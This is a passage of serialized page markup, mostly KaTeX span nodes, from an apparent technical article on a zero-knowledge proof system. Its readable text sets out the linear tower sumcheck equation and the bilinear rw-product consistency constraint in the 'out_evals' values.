transcript. This leaves us with two equations:",{"type":27,"tag":12719,"props":126247,"children":126248},{},[126249],{"type":27,"tag":1232,"props":126250,"children":126251},{},[126252,126257,126259,126265],{"type":27,"tag":12606,"props":126253,"children":126254},{},[126255],{"type":33,"value":126256},"GKR/Tower equation",{"type":33,"value":126258}," (linear in ",{"type":27,"tag":84,"props":126260,"children":126262},{"className":126261},[],[126263],{"type":33,"value":126264},"out_evals",{"type":33,"value":31210},{"type":27,"tag":36,"props":126267,"children":126268},{},[126269,126271],{"type":33,"value":126270},"The tower sumcheck claim is ",{"type":27,"tag":84,"props":126272,"children":126274},{"className":126273},[11266,11267],[126275],{"type":27,"tag":207,"props":126276,"children":126278},{"className":126277},[11272],[126279],{"type":27,"tag":207,"props":126280,"children":126282},{"className":126281,"ariaHidden":11278},[11277],[126283,126314,126439],{"type":27,"tag":207,"props":126284,"children":126286},{"className":126285},[11283],[126287,126291,126301,126305,126310],{"type":27,"tag":207,"props":126288,"children":126290},{"className":126289,"style":100179},[11288],[],{"type":27,"tag":207,"props":126292,"children":126294},{"className":126293},[11294,33],[126295],{"type":27,"tag":207,"props":126296,"children":126298},{"className":126297},[11294],[126299],{"type":33,"value":126300},"claim",{"type":27,"tag":207,"props":126302,"children":126304},{"className":126303,"style":11470},[11372],[],{"type":27,"tag":207,"props":126306,"children":126308},{"className":126307},[11475],[126309],{"type":33,"value":10380},{"type":27,"tag":207,"props":126311,"children":126313},{"className":126312,"style":11470},[11372],[],{"type":27,"tag":207,"props":126315,"children":126317},{"className":126316},[11283],[126318,126323,126380,126384,126426,126430,126435],{"type":27,"tag":207,"props":126319,"children":126322},{"className":126320,"style":126321},[11288],"height:1.2605em;vertical-align:-0.4358em;",[],{"type":27,"tag":207,"props":126324,"children":126326},{"className":126325},[28896],[126327,126332],{"type":27,"tag":207,"props":126328,"children":126330},{"className":126329,"style":28903},[28896,28901,28902],[126331],{"type":33,"value":116046},{"type":27,"tag":207,"props":126333,"children":126335},{"className":126334},[11309],[126336],{"type":27,"tag":207,"props":126337,"children":126339},{"className":126338},[11314,28914],[126340,126369],{"type":27,"tag":207,"props":126341,"children":126343},{"className":126342},[11319],[126344,126364],{"type":27,"tag":207,"props":126345,"children":126347},{"className":126346,"style":121458},[11324],[126348],{"type":27,"tag":207,"props":126349,"children":126350},{"style":28927},[126351,126355],{"type":27,"tag":207,"props":126352,"children":126354},{"className":126353,"style":11334},[11333],[],{"type":27,"tag":207,"props":126356,"children":126358},{"className":126357},[11339,11340,11341,11342],[126359],{"type":27,"tag":207,"props":126360,"children":126362},{"className":126361,"style":121474},[11294,28860,11342],[126363],{"type":33,"value":15937},{"type":27,"tag":207,"props":126365,"children":126367},{"className":126366},[29017],[126368],{"type":33,"value":29020},{"type":27,"tag":207,"props":126370,"children":126372},{"className":126371},[11319],[126373],{"type":27,"tag":207,"props":126374,"children":126376},{"className":126375,"style":121489},[11324],[126377],{"type":27,"tag":207,"props":126378,"children":126379},{},[],{"type":27,"tag":207,"props":126381,"children":126383},{"className":126382,"style":11411},[11372],[],{"type":27,"tag":207,"props":126385,"children":126387},{"className":126386},[11294],[126388,126393],{"type":27,"tag":207,"props":126389,"children":126391},{"className":126390,"style":122338},[11294,28860],[126392],{"type":33,"value":122341},{"type":27,"tag":207,"props":126394,"children":126396},{"className":126395},[11309],[126397],{"type":27,"tag":207,"props":126398,"children":126400},{"className":126399},[11314],[126401],{"type":27,"tag":207,"props":126402,"children":126404},{"className":126403},[11319],[126405],{"type":27,"tag":207,"props":126406,"children":126409},{"className":126407,"style":126408},[11324],"height:0.8247em;",[126410],{"type":27,"tag":207,"props":126411,"children":126412},{"style":11328},[126413,126417],{"type":27,"tag":207,"props":126414,"children":126416},{"className":126415,"style":11334},[11333],[],{"type":27,"tag":207,"props":126418,"children":126420},{"className":126419},[11339,11340,11341,11342],[126421],{"type":27,"tag":207,"props":126422,"children":126424},{"className":126423,"style":121474},[11294,28860,11342],[126425],{"type":33,"value":15937},{"type":27,"tag":207,"props":126427,"children":126429},{"className":126428,"style":11373},[11372],[],{"type":27,"tag":207,"props":126431,"children":126433},{"className":126432},[11378],[126434],{"type":33,"value":118513},{"type":27,"tag":207,"props":126436,"children":126438},{"className":126437,"style":11373},[11372],[],{"type":27,"tag":207,"props":126440,"children":126442},{"className":126441},[11283],[126443,126447,126456,126461],{"type":27,"tag":207,"props":126444,"children":126446},{"className":126445,"style":101677},[11288],[],{"type":27,"tag":207,"props":126448,"children":126450},{"className":126449},[11294,33],[126451],{"type":27,"tag":207,"props":126452,"children":126454},{"className":126453},[11294],[126455],{"type":33,"value":125924},{"type":27,"tag":207,"props":126457,"children":126459},{"className":126458,"style":100264},[11294],[126460],{"type":33,"value":10371},{"type":27,"tag":207,"props":126462,"children":126464},{"className":126463},[11294],[126465,126474],{"type":27,"tag":207,"props":126466,"children":126468},{"className":126467},[11294,33],[126469],{"type":27,"tag":207,"props":126470,"children":126472},{"className":126471},[11294],[126473],{"type":33,"value":125943},{"type":27,"tag":207,"props":126475,"children":126477},{"className":126476},[11309],[126478],{"type":27,"tag":207,"props":126479,"children":126481},{"className":126480},[11314,28914],[126482,126511],{"type":27,"tag":207,"props":126483,"children":126485},{"className":126484},[11319],[126486,126506],{"type":27,"tag":207,"props":126487,"children":126489},{"className":126488,"style":100793},[11324],[126490],{"type":27,"tag":207,"props":126491,"children":126492},{"style":121381},[126493,126497],{"type":27,"tag":207,"props":126494,"children":126496},{"className":126495,"style":11334},[11333],[],{"type":27,"tag":207,"props":126498,"children":126500},{"className":126499},[11339,11340,11341,11342],[126501],{"type":27,"tag":207,"props":126502,"children":126504},{"className":126503,"style":121474},[11294,28860,11342],[126505],{"type":33,"value":15937},{"type":27,"tag":207,"props":126507,"children":126509},{"className":126508},[29017],[126510],{"type":33,"value":29020},{"type":27,"tag":207,"props":126512,"children":126514},{"className":126513},[11319],[126515],{"type":27,"tag":207,"props":126516,"children":126518},{"className":126517,"style":126160},[11324],[126519],{"type":27,"tag":207,"props":126520,"children":126521},{},[],{"type":27,"tag":36,"props":126523,"children":126524},{},[126525,126527,126532],{"type":33,"value":126526},"This check is linear in ",{"type":27,"tag":84,"props":126528,"children":126530},{"className":126529},[],[126531],{"type":33,"value":126264},{"type":33,"value":1041},{"type":27,"tag":12719,"props":126534,"children":126535},{"start":244},[126536],{"type":27,"tag":1232,"props":126537,"children":126538},{},[126539,126544,126546,126551],{"type":27,"tag":12606,"props":126540,"children":126541},{},[126542],{"type":33,"value":126543},"rw-product consistency",{"type":33,"value":126545}," (bilinear in ",{"type":27,"tag":84,"props":126547,"children":126549},{"className":126548},[],[126550],{"type":33,"value":126264},{"type":33,"value":31210},{"type":27,"tag":36,"props":126553,"children":126554},{},[126555],{"type":27,"tag":84,"props":126556,"children":126558},{"className":126557},[11266,11267],[126559],{"type":27,"tag":207,"props":126560,"children":126562},{"className":126561},[11272],[126563],{"type":27,"tag":207,"props":126564,"children":126566},{"className":126565,"ariaHidden":11278},[11277],[126567,126738,126909],{"type":27,"tag":207,"props":126568,"children":126570},{"className":126569},[11283],[126571,126575,126632,126636,126645,126650,126659,126664,126725,126729,126734],{"type":27,"tag":207,"props":126572,"children":126574},{"className":126573,"style":100206},[11288],[],{"type":27,"tag":207,"props":126576,"children":126578},{"className":126577},[28896],[126579,126584],{"type":27,"tag":207,"props":126580,"children":126582},{"className":126581,"style":28903},[28896,28901,28902],[126583],{"type":33,"value":125848},{"type":27,"tag":207,"props":126585,"children":126587},{"className":126586},[11309],[126588],{"type":27,"tag":207,"props":126589,"children":126591},{"className":126590},[11314,28914],[126592,126621],{"type":27,"tag":207,"props":126593,"children":126595},{"className":126594},[11319],[126596,126616],{"type":27,"tag":207,"props":126597,"children":126599},{"className":126598,"style":121458},[11324],[126600],{"type":27,"tag":207,"props":126601,"children":126602},{"style":28927},[126603,126607],{"type":27,"tag":207,"props":126604,"children":126606},{"className":126605,"style":11334},[11333],[],{"type":27,"tag":207,"props":126608,"children":126610},{"className":126609},[11339,11340,11341,11342],[126611],{"type":27,"tag":207,"props":126612,"children":126614},{"className":126613},[11294,28860,11342],[126615],{"type":33,"value":4690},{"type":27,"tag":207,"props":126617,"children":126619},{"className":126618},[29017],[126620],{"type":33,"value":29020},{"type":27,"tag":207,"props":126622,"children":126624},{"className":126623},[11319],[126625],{"type":27,"tag":207,"props":126626,"children":126628},{"className":126627,"style":121738},[11324],[126629],{"type":27,"tag":207,"props":126630,"children":126631},{},[],{"type":27,"tag":207,"props":126633,"children":126635},{"className":126634,"style":11411},[11372],[],{"type":27,"tag":207,"props":126637,"children":126639},{"className":126638},[11294,33],[126640],{"type":27,"tag":207,"props":126641,"children":126643},{"className":126642},[11294],[126644],{"type":33,"value":101083},{"type":27,"tag":207,"props":126646,"children":126648},{"className":126647,"style":100264},[11294],[126649],{"type":33,"value":10371},{"type":27,"tag":207,"props":126651,"children":126653},{"className":126652},[11294,33],[126654],{"type":27,"tag":207,"props":126655,"children":126657},{"className":126656},[11294],[126658],{"type":33,"value":125924},{"type":27,"tag":207,"props":126660,"children":126662},{"className":126661,"style":100264},[11294],[126663],{"type":33,"value":10371},{"type":27,"tag":207,"props":126665,"children":126667},{"className":126666},[11294],[126668,126677],{"type":27,"tag":207,"props":126669,"children":126671},{"className":126670},[11294,33],[126672],{"type":27,"tag":207,"props":126673,"children":126675},{"className":126674},[11294],[126676],{"type":33,"value":125943},{"type":27,"tag":207,"props":126678,"children":126680},{"className":126679},[11309],[126681],{"type":27,"tag":207,"props":126682,"children":126684},{"className":126683},[11314,28914],[126685,126714],{"type":27,"tag":207,"props":126686,"children":126688},{"className":126687},[11319],[126689,126709],{"type":27,"tag":207,"props":126690,"children":126692},{"className":126691,"style":100793},[11324],[126693],{"type":27,"tag":207,"props":126694,"children":126695},{"style":121381},[126696,126700],{"type":27,"tag":207,"props":126697,"children":126699},{"className":126698,"style":11334},[11333],[],{"type":27,"tag":207,"props":126701,"children":126703},{"className":126702},[11339,11340,11341,11342],[126704],{"type":27,"tag":207,"props":126705,"children":126707},{"className":126706},[11294,28860,11342],[126708],{"type":33,"value":4690},{"type":27,"tag":207,"props":126710,"children":126712},{"className":126711},[29017],[126713],{"type":33,"value":29020},{"type":27,"tag":207,"props":126715,"children":126717},{"className":126716},[11319],[126718],{"type":27,"tag":207,"props":126719,"children":126721},{"className":126720,"style":100347},[11324],[126722],{"type":27,"tag":207,"props":126723,"children":126724},{},[],{"type":27,"tag":207,"props":126726,"children":126728},{"className":126727,"style":11470},[11372],[],{"type":27,"tag":207,"props":126730,"children":126732},{"className":126731},[11475],[126733],{"type":33,"value":10380},{"type":27,"tag":207,"props":126735,"children":126737},{"className":126736,"style":11470},[11372],[],{"type":27,"tag":207,"props":126739,"children":126741},{"className":126740},[11283],[126742,126746,126803,126807,126816,126821,126830,126835,126896,126900,126905],{"type":27,"tag":207,"props":126743,"children":126745},{"className":126744,"style":126012},[11288],[],{"type":27,"tag":207,"props":126747,"children":126749},{"className":126748},[28896],[126750,126755],{"type":27,"tag":207,"props":126751,"children":126753},{"className":126752,"style":28903},[28896,28901,28902],[126754],{"type":33,"value":125848},{"type":27,"tag":207,"props":126756,"children":126758},{"className":126757},[11309],[126759],{"type":27,"tag":207,"props":126760,"children":126762},{"className":126761},[11314,28914],[126763,126792],{"type":27,"tag":207,"props":126764,"children":126766},{"className":126765},[11319],[126767,126787],{"type":27,"tag":207,"props":126768,"children":126770},{"className":126769,"style":121458},[11324],[126771],{"type":27,"tag":207,"props":126772,"children":126773},{"style":28927},[126774,126778],{"type":27,"tag":207,"props":126775,"children":126777},{"className":126776,"style":11334},[11333],[],{"type":27,"tag":207,"props":126779,"children":126781},{"className":126780},[11339,11340,11341,11342],[126782],{"type":27,"tag":207,"props":126783,"children":126785},{"className":126784,"style":121474},[11294,28860,11342],[126786],{"type":33,"value":15937},{"type":27,"tag":207,"props":126788,"children":126790},{"className":126789},[29017],[126791],{"type":33,"value":29020},{"type":27,"tag":207,"props":126793,"children":126795},{"className":126794},[11319],[126796],{"type":27,"tag":207,"props":126797,"children":126799},{"className":126798,"style":121489},[11324],[126800],{"type":27,"tag":207,"props":126801,"children":126802},{},[],{"type":27,"tag":207,"props":126804,"children":126806},{"className":126805,"style":11411},[11372],[],{"type":27,"tag":207,"props":126808,"children":126810},{"className":126809},[11294,33],[126811],{"type":27,"tag":207,"props":126812,"children":126814},{"className":126813},[11294],[126815],{"type":33,"value":56810},{"type":27,"tag":207,"props":126817,"children":126819},{"className":126818,"style":100264},[11294],[126820],{"type":33,"value":10371},{"type":27,"tag":207,"props":126822,"children":126824},{"className":126823},[11294,33],[126825],{"type":27,"tag":207,"props":126826,"children":126828},{"className":126827},[11294],[126829],{"type":33,"value":125924},{"type":27,"tag":207,"props":126831,"children":126833},{"className":126832,"style":100264},[11294],[126834],{"type":33,"value":10371},{"type":27,"tag":207,"props":126836,"children":126838},{"className":126837},[11294],[126839,126848],{"type":27,"tag":207,"props":126840,"children":126842},{"className":126841},[11294,33],[126843],{"type":27,"tag":207,"props":126844,"children":126846},{"className":126845},[11294],[126847],{"type":33,"value":125943},{"type":27,"tag":207,"props":126849,"children":126851},{"className":126850},[11309],[126852],{"type":27,"tag":207,"props":126853,"children":126855},{"className":126854},[11314,28914],[126856,126885],{"type":27,"tag":207,"props":126857,"children":126859},{"className":126858},[11319],[126860,126880],{"type":27,"tag":207,"props":126861,"children":126863},{"className":126862,"style":100793},[11324],[126864],{"type":27,"tag":207,"props":126865,"children":126866},{"style":121381},[126867,126871],{"type":27,"tag":207,"props":126868,"children":126870},{"className":126869,"style":11334},[11333],[],{"type":27,"tag":207,"props":126872,"children":126874},{"className":126873},[11339,11340,11341,11342],[126875],{"type":27,"tag":207,"props":126876,"children":126878},{"className":126877,"style":121474},[11294,28860,11342],[126879],{"type":33,"value":15937},{"type":27,"tag":207,"props":126881,"children":126883},{"className":126882},[29017],[126884],{"type":33,"value":29020},{"type":27,"tag":207,"props":126886,"children":126888},{"className":126887},[11319],[126889],{"type":27,"tag":207,"props":126890,"children":126892},{"className":126891,"style":126160},[11324],[126893],{"type":27,"tag":207,"props":126894,"children":126895},{},[],{"type":27,"tag":207,"props":126897,"children":126899},{"className":126898,"style":11373},[11372],[],{"type":27,"tag":207,"props":126901,"children":126903},{"className":126902},[11378],[126904],{"type":33,"value":118513},{"type":27,"tag":207,"props":126906,"children":126908},{"className":126907,"style":11373},[11372],[],{"type":27,"tag":207,"props":126910,"children":126912},{"className":126911},[11283],[126913,126917,126922,126931],{"type":27,"tag":207,"props":126914,"children":126916},{"className":126915,"style":11393},[11288],[],{"type":27,"tag":207,"props":126918,"children":126920},{"className":126919},[28989],[126921],{"type":33,"value":1343},{"type":27,"tag":207,"props":126923,"children":126925},{"className":126924},[11294,33],[126926],{"type":27,"tag":207,"props":126927,"children":126929},{"className":126928},[11294],[126930],{"type":33,"value":126200},{"type":27,"tag":207,"props":126932,"children":126934},{"className":126933},[29011],[126935],{"type":33,"value":10416},{"type":27,"tag":36,"props":126937,"children":126938},{},[126939,126941,127110,127111,127280],{"type":33,"value":126940},"If we vary ",{"type":27,"tag":84,"props":126942,"children":126944},{"className":126943},[11266,11267],[126945],{"type":27,"tag":207,"props":126946,"children":126948},{"className":126947},[11272],[126949],{"type":27,"tag":207,"props":126950,"children":126952},{"className":126951,"ariaHidden":11278},[11277],[126953,127031],{"type":27,"tag":207,"props":126954,"children":126956},{"className":126955},[11283],[126957,126961,127018,127022,127027],{"type":27,"tag":207,"props":126958,"children":126960},{"className":126959,"style":117221},[11288],[],{"type":27,"tag":207,"props":126962,"children":126964},{"className":126963},[11294],[126965,126970],{"type":27,"tag":207,"props":126966,"children":126968},{"className":126967},[11294,28860],[126969],{"type":33,"value":26546},{"type":27,"tag":207,"props":126971,"children":126973},{"className":126972},[11309],[126974],{"type":27,"tag":207,"props":126975,"children":126977},{"className":126976},[11314,28914],[126978,127007],{"type":27,"tag":207,"props":126979,"children":126981},{"className":126980},[11319],[126982,127002],{"type":27,"tag":207,"props":126983,"children":126985},{"className":126984,"style":100316},[11324],[126986],{"type":27,"tag":207,"props":126987,"children":126988},{"style":100320},[126989,126993],{"type":27,"tag":207,"props":126990,"children":126992},{"className":126991,"style":11334},[11333],[],{"type":27,"tag":207,"props":126994,"children":126996},{"className":126995},[11339,11340,11341,11342],[126997],{"type":27,"tag":207,"props":126998,"children":127000},{"className":126999},[11294,11342],[127001],{"type":33,"value":1660},{"type":27,"tag":207,"props":127003,"children":127005},{"className":127004},[29017],[127006],{"type":33,"value":29020},{"type":27,"tag":207,"props":127008,"children":127010},{"className":127009},[11319],[127011],{"type":27,"tag":207,"props":127012,"children":127014},{"className":127013,"style":100347},[11324],[127015],{"type":27,"tag":207,"props":127016,"children":127017},{},[],{"type":27,"tag":207,"props":127019,"children":127021},{"className":127020,"style":11470},[11372],[],{"type":27,"tag":207,"props":127023,"children":127025},{"className":127024},[11475],[127026],{"type":33,"value":10380},{"type":27,"tag":207,"props":127028,"children":127030},{"className":127029,"style":11470},[11372],[],{"type":27,"tag":207,"props":127032,"children":127034},{"className":127033},[11283],[127035,127039,127080,127085,127090,127095,127100,127105],{"type":27,"tag":207,"props":127036,"children":127038},{"className":127037,"style":100206},[11288],[],{"type":27,"tag":207,"props":127040,"children":127042},{"className":127041},[11294],[127043,127052,127057,127066,127071],{"type":27,"tag":207,"props":127044,"children":127046},{"className":127045},[11294,33],[127047],{"type":27,"tag":207,"props":127048,"children":127050},{"className":127049},[11294],[127051],{"type":33,"value":101083},{"type":27,"tag":207,"props":127053,"children":127055},{"className":127054,"style":100264},[11294],[127056],{"type":33,"value":10371},{"type":27,"tag":207,"props":127058,"children":127060},{"className":127059},[11294,33],[127061],{"type":27,"tag":207,"props":127062,"children":127064},{"className":127063},[11294],[127065],{"type":33,"value":125924},{"type":27,"tag":207,"props":127067,"children":127069},{"className":127068,"style":100264},[11294],[127070],{"type":33,"value":10371},{"type":27,"tag":207,"props":127072,"children":127074},{"className":127073},[11294,33],[127075],{"type":27,"tag":207,"props":127076,"children":127078},{"className":127077},[11294],[127079],{"type":33,"value":125943},{"type":27,"tag":207,"props":127081,"children":127083},{"className":127082},[28989],[127084],{"type":33,"value":11019},{"type":27,"tag":207,"props":127086,"children":127088},{"className":127087},[11294],[127089],{"type":33,"value":1660},{"type":27,"tag":207,"props":127091,"children":127093},{"className":127092},[29011],[127094],{"type":33,"value":22686},{"type":27,"tag":207,"props":127096,"children":127098},{"className":127097},[28989],[127099],{"type":33,"value":11019},{"type":27,"tag":207,"props":127101,"children":127103},{"className":127102},[11294],[127104],{"type":33,"value":1660},{"type":27,"tag":207,"props":127106,"children":127108},{"className":127107},[29011],[127109],{"type":33,"value":22686},{"type":33,"value":1131},{"type":27,"tag":84,"props":127112,"children":127114},{"className":127113},[11266,11267],[127115],{"type":27,"tag":207,"props":127116,"children":127118},{"className":127117},[11272],[127119],{"type":27,"tag":207,"props":127120,"children":127122},{"className":127121,"ariaHidden":11278},[11277],[127123,127201],{"type":27,"tag":207,"props":127124,"children":127126},{"className":127125},[11283],[127127,127131,127188,127192,127197],{"type":27,"tag":207,"props":127128,"children":127130},{"className":127129,"style":117221},[11288],[],{"type":27,"tag":207,"props":127132,"children":127134},{"className":127133},[11294],[127135,127140],{"type":27,"tag":207,"props":127136,"children":127138},{"className":127137},[11294,28860],[127139],{"type":33,"value":26546},{"type":27,"tag":207,"props":127141,"children":127143},{"className":127142},[11309],[127144],{"type":27,"tag":207,"props":127145,"children":127147},{"className":127146},[11314,28914],[127148,127177],{"type":27,"tag":207,"props":127149,"children":127151},{"className":127150},[11319],[127152,127172],{"type":27,"tag":207,"props":127153,"children":127155},{"className":127154,"style":100316},[11324],[127156],{"type":27,"tag":207,"props":127157,"children":127158},{"style":100320},[127159,127163],{"type":27,"tag":207,"props":127160,"children":127162},{"className":127161,"style":11334},[11333],[],{"type":27,"tag":207,"props":127164,"children":127166},{"className":127165},[11339,11340,11341,11342],[127167],{"type":27,"tag":207,"props":127168,"children":127170},{"className":127169},[11294,11342],[127171],{"type":33,"value":1651},{"type":27,"tag":207,"props":127173,"children":127175},{"className":127174},[29017],[127176],{"type":33,"value":29020},{"type":27,"tag":207,"props":127178,"children":127180},{"className":127179},[11319],[127181],{"type":27,"tag":207,"props":127182,"children":127184},{"className":127183,"style":100347},[11324],[127185],{"type":27,"tag":207,"props":127186,"children":127187},{},[],{"type":27,"tag":207,"props":127189,"children":127191},{"className":127190,"style":11470},[11372],[],{"type":27,"tag":207,"props":127193,"children":127195},{"className":127194},[11475],[127196],{"type":33,"value":10380},{"type":27,"tag":207,"props":127198,"children":127200},{"className":127199,"style":11470},[11372],[],{"type":27,"tag":207,"props":127202,"children":127204},{"className":127203},[11283],[127205,127209,127250,127255,127260,127265,127270,127275],{"type":27,"tag":207,"props":127206,"children":127208},{"className":127207,"style":100206},[11288],[],{"type":27,"tag":207,"props":127210,"children":127212},{"className":127211},[11294],[127213,127222,127227,127236,127241],{"type":27,"tag":207,"props":127214,"children":127216},{"className":127215},[11294,33],[127217],{"type":27,"tag":207,"props":127218,"children":127220},{"className":127219},[11294],[127221],{"type":33,"value":101083},{"type":27,"tag":207,"props":127223,"children":127225},{"className":127224,"style":100264},[11294],[127226],{"type":33,"value":10371},{"type":27,"tag":207,"props":127228,"children":127230},{"className":127229},[11294,33],[127231],{"type":27,"tag":207,"props":127232,"children":127234},{"className":127233},[11294],[127235],{"type":33,"value":125924},{"type":27,"tag":207,"props":127237,"children":127239},{"className":127238,"style":100264},[11294],[127240],{"type":33,"value":10371},{"type":27,"tag":207,"props":127242,"children":127244},{"className":127243},[11294,33],[127245],{"type":27,"tag":207,"props":127246,"children":127248},{"className":127247},[11294],[127249],{"type":33,"value":125943},{"type":27,"tag":207,"props":127251,"children":127253},{"className":127252},[28989],[127254],{"type":33,"value":11019},{"type":27,"tag":207,"props":127256,"children":127258},{"className":127257},[11294],[127259],{"type":33,"value":1660},{"type":27,"tag":207,"props":127261,"children":127263},{"className":127262},[29011],[127264],{"type":33,"value":22686},{"type":27,"tag":207,"props":127266,"children":127268},{"className":127267},[28989],[127269],{"type":33,"value":11019},{"type":27,"tag":207,"props":127271,"children":127273},{"className":127272},[11294],[127274],{"type":33,"value":1651},{"type":27,"tag":207,"props":127276,"children":127278},{"className":127277},[29011],[127279],{"type":33,"value":22686},{"type":33,"value":127281}," we get the following constraint:",{"type":27,"tag":36,"props":127283,"children":127284},{},[127285],{"type":27,"tag":84,"props":127286,"children":127288},{"className":127287},[11266,11267],[127289],{"type":27,"tag":207,"props":127290,"children":127292},{"className":127291},[11272],[127293],{"type":27,"tag":207,"props":127294,"children":127296},{"className":127295,"ariaHidden":11278},[11277],[127297,127376,127454,127495],{"type":27,"tag":207,"props":127298,"children":127300},{"className":127299},[11283],[127301,127306,127363,127367,127372],{"type":27,"tag":207,"props":127302,"children":127305},{"className":127303,"style":127304},[11288],"height:0.5945em;vertical-align:-0.15em;",[],{"type":27,"tag":207,"props":127307,"children":127309},{"className":127308},[11294],[127310,127315],{"type":27,"tag":207,"props":127311,"children":127313},{"className":127312},[11294,28860],[127314],{"type":33,"value":26546},{"type":27,"tag":207,"props":127316,"children":127318},{"className":127317},[11309],[127319],{"type":27,"tag":207,"props":127320,"children":127322},{"className":127321},[11314,28914],[127323,127352],{"type":27,"tag":207,"props":127324,"children":127326},{"className":127325},[11319],[127327,127347],{"type":27,"tag":207,"props":127328,"children":127330},{"className":127329,"style":100316},[11324],[127331],{"type":27,"tag":207,"props":127332,"children":127333},{"style":100320},[127334,127338],{"type":27,"tag":207,"props":127335,"children":127337},{"className":127336,"style":11334},[11333],[],{"type":27,"tag":207,"props":127339,"children":127341},{"className":127340},[11339,11340,11341,11342],[127342],{"type":27,"tag":207,"props":127343,"children":127345},{"className":127344},[11294,11342],[127346],{"type":33,"value":1660},{"type":27,"tag":207,"props":127348,"children":127350},{"className":127349},[29017],[127351],{"type":33,"value":29020},{"type":27,"tag":207,"props":127353,"children":127355},{"className":127354},[11319],[127356],{"type":27,"tag":207,"props":127357,"children":127359},{"className":127358,"style":100347},[11324],[127360],{"type":27,"tag":207,"props":127361,"children":127362},{},[],{"type":27,"tag":207,"props":127364,"children":127366},{"className":127365,"style":11373},[11372],[],{"type":27,"tag":207,"props":127368,"children":127370},{"className":127369},[11378],[127371],{"type":33,"value":118513},{"type":27,"tag":207,"props":127373,"children":127375},{"className":127374,"style":11373},[11372],[],{"type":27,"tag":207,"props":127377,"children":127379},{"className":127378},[11283],[127380,127384,127441,127445,127450],{"type":27,"tag":207,"props":127381,"children":127383},{"className":127382,"style":127304},[11288],[],{"type":27,"tag":207,"props":127385,"children":127387},{"className":127386},[11294],[127388,127393],{"type":27,"tag":207,"props":127389,"children":127391},{"className":127390},[11294,28860],[127392],{"type":33,"value":26546},{"type":27,"tag":207,"props":127394,"children":127396},{"className":127395},[11309],[127397],{"type":27,"tag":207,"props":127398,"children":127400},{"className":127399},[11314,28914],[127401,127430],{"type":27,"tag":207,"props":127402,"children":127404},{"className":127403},[11319],[127405,127425],{"type":27,"tag":207,"props":127406,"children":127408},{"className":127407,"style":100316},[11324],[127409],{"type":27,"tag":207,"props":127410,"children":127411},{"style":100320},[127412,127416],{"type":27,"tag":207,"props":127413,"children":127415},{"className":127414,"style":11334},[11333],[],{"type":27,"tag":207,"props":127417,"children":127419},{"className":127418},[11339,11340,11341,11342],[127420],{"type":27,"tag":207,"props":127421,"children":127423},{"className":127422},[11294,11342],[127424],{"type":33,"value":1651},{"type":27,"tag":207,"props":127426,"children":127428},{"className":127427},[29017],[127429],{"type":33,"value":29020},{"type":27,"tag":207,"props":127431,"children":127433},{"className":127432},[11319],[127434],{"type":27,"tag":207,"props":127435,"children":127437},{"className":127436,"style":100347},[11324],[127438],{"type":27,"tag":207,"props":127439,"children":127440},{},[],{"type":27,"tag":207,"props":127442,"children":127444},{"className":127443,"style":11373},[11372],[],{"type":27,"tag":207,"props":127446,"children":127448},{"className":127447},[11378],[127449],{"type":33,"value":118513},{"type":27,"tag":207,"props":127451,"children":127453},{"className":127452,"style":11373},[11372],[],{"type":27,"tag":207,"props":127455,"children":127457},{"className":127456},[11283],[127458,127462,127467,127477,127482,127486,127491],{"type":27,"tag":207,"props":127459,"children":127461},{"className":127460,"style":11393},[11288],[],{"type":27,"tag":207,"props":127463,"children":127465},{"className":127464},[28989],[127466],{"type":33,"value":1343},{"type":27,"tag":207,"props":127468,"children":127470},{"className":127469},[11294,33],[127471],{"type":27,"tag":207,"props":127472,"children":127474},{"className":127473},[11294],[127475],{"type":33,"value":127476},"rest of product",{"type":27,"tag":207,"props":127478,"children":127480},{"className":127479},[29011],[127481],{"type":33,"value":10416},{"type":27,"tag":207,"props":127483,"children":127485},{"className":127484,"style":11470},[11372],[],{"type":27,"tag":207,"props":127487,"children":127489},{"className":127488},[11475],[127490],{"type":33,"value":10380},{"type":27,"tag":207,"props":127492,"children":127494},{"className":127493,"style":11470},[11372],[],{"type":27,"tag":207,"props":127496,"children":127498},{"className":127497},[11283],[127499,127503],{"type":27,"tag":207,"props":127500,"children":127502},{"className":127501,"style":122271},[11288],[],{"type":27,"tag":207,"props":127504,"children":127506},{"className":127505},[11294,33],[127507],{"type":27,"tag":207,"props":127508,"children":127510},{"className":127509},[11294],[127511],{"type":33,"value":8941},{"type":27,"tag":36,"props":127513,"children":127514},{},[127515,127517,127670],{"type":33,"value":127516},"This is bilinear in ",{"type":27,"tag":84,"props":127518,"children":127520},{"className":127519},[11266,11267],[127521],{"type":27,"tag":207,"props":127522,"children":127524},{"className":127523},[11272],[127525],{"type":27,"tag":207,"props":127526,"children":127528},{"className":127527,"ariaHidden":11278},[11277],[127529],{"type":27,"tag":207,"props":127530,"children":127532},{"className":127531},[11283],[127533,127537,127542,127599,127604,127608,127665],{"type":27,"tag":207,"props":127534,"children":127536},{"className":127535,"style":11393},[11288],[],{"type":27,"tag":207,"props":127538,"children":127540},{"className":127539},[28989],[127541],{"type":33,"value":1343},{"type":27,"tag":207,"props":127543,"children":127545},{"className":127544},[11294],[127546,127551],{"type":27,"tag":207,"props":127547,"children":127549},{"className":127548},[11294,28860],[127550],{"type":33,"value":26546},{"type":27,"tag":207,"props":127552,"children":127554},{"className":127553},[11309],[127555],{"type":27,"tag":207,"props":127556,"children":127558},{"className":127557},[11314,28914],[127559,127588],{"type":27,"tag":207,"props":127560,"children":127562},{"className":127561},[11319],[127563,127583],{"type":27,"tag":207,"props":127564,"children":127566},{"className":127565,"style":100316},[11324],[127567],{"type":27,"tag":207,"props":127568,"children":127569},{"style":100320},[127570,127574],{"type":27,"tag":207,"props":127571,"children":127573},{"className":127572,"style":11334},[11333],[],{"type":27,"tag":207,"props":127575,"children":127577},{"className":127576},[11339,11340,11341,11342],[127578],{"type":27,"tag":207,"props":127579,"children":127581},{"className":127580},[11294,11342],[127582],{"type":33,"value":1660},{"type":27,"tag":207,"props":127584,"children":127586},{"className":127585},[29017],[127587],{"type":33,"value":29020},{"type":27,"tag":207,"props":127589,"children":127591},{"className":127590},[11319],[127592],{"type":27,"tag":207,"props":127593,"children":127595},{"className":127594,"style":100347},[11324],[127596],{"type":27,"tag":207,"props":127597,"children":127598},{},[],{"type":27,"tag":207,"props":127600,"children":127602},{"className":127601},[11404],[127603],{"type":33,"value":11407},{"type":27,"tag":207,"props":127605,"children":127607},{"className":127606,"style":11411},[11372],[],{"type":27,"tag":207,"props":127609,"children":127611},{"className":127610},[11294],[127612,127617],{"type":27,"tag":207,"props":127613,"children":127615},{"className":127614},[11294,28860],[127616],{"type":33,"value":26546},{"type":27,"tag":207,"props":127618,"children":127620},{"className":127619},[1130